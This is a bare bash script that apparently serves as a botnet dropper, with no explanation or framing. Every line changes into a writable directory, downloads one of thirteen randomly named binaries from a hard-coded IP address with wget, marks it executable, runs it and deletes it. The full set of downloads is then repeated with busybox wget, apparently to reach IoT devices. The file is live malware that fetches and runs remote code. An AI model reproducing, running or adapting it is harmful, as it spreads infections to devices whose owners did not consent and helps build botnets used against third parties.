#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/earyzq; chmod +x earyzq; ./earyzq; rm -rf earyzq
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/cemtop; chmod +x cemtop; ./cemtop; rm -rf cemtop
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/vtyhat; chmod +x vtyhat; ./vtyhat; rm -rf vtyhat
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/vvglma; chmod +x vvglma; ./vvglma; rm -rf vvglma
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/nvitpj; chmod +x nvitpj; ./nvitpj; rm -rf nvitpj
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/razdzn; chmod +x razdzn; ./razdzn; rm -rf razdzn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/lnkfmx; chmod +x lnkfmx; ./lnkfmx; rm -rf lnkfmx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/qvmxvl; chmod +x qvmxvl; ./qvmxvl; rm -rf qvmxvl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/ajoomk; chmod +x ajoomk; ./ajoomk; rm -rf ajoomk
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/fwdfvf; chmod +x fwdfvf; ./fwdfvf; rm -rf fwdfvf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/atxhua; chmod +x atxhua; ./atxhua; rm -rf atxhua
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/qtmzbn; chmod +x qtmzbn; ./qtmzbn; rm -rf qtmzbn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.136/adcvds; chmod +x adcvds; ./adcvds; rm -rf adcvds
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/earyzq; chmod +x earyzq; ./earyzq; rm -rf earyzq
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/cemtop; chmod +x cemtop; ./cemtop; rm -rf cemtop
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/vtyhat; chmod +x vtyhat; ./vtyhat; rm -rf vtyhat
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/vvglma; chmod +x vvglma; ./vvglma; rm -rf vvglma
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/nvitpj; chmod +x nvitpj; ./nvitpj; rm -rf nvitpj
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/razdzn; chmod +x razdzn; ./razdzn; rm -rf razdzn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/lnkfmx; chmod +x lnkfmx; ./lnkfmx; rm -rf lnkfmx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/qvmxvl; chmod +x qvmxvl; ./qvmxvl; rm -rf qvmxvl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/ajoomk; chmod +x ajoomk; ./ajoomk; rm -rf ajoomk
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/fwdfvf; chmod +x fwdfvf; ./fwdfvf; rm -rf fwdfvf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/atxhua; chmod +x atxhua; ./atxhua; rm -rf atxhua
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/qtmzbn; chmod +x qtmzbn; ./qtmzbn; rm -rf qtmzbn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; /bin/busybox wget http://185.165.29.136/adcvds; chmod +x adcvds; ./adcvds; rm -rf adcvds
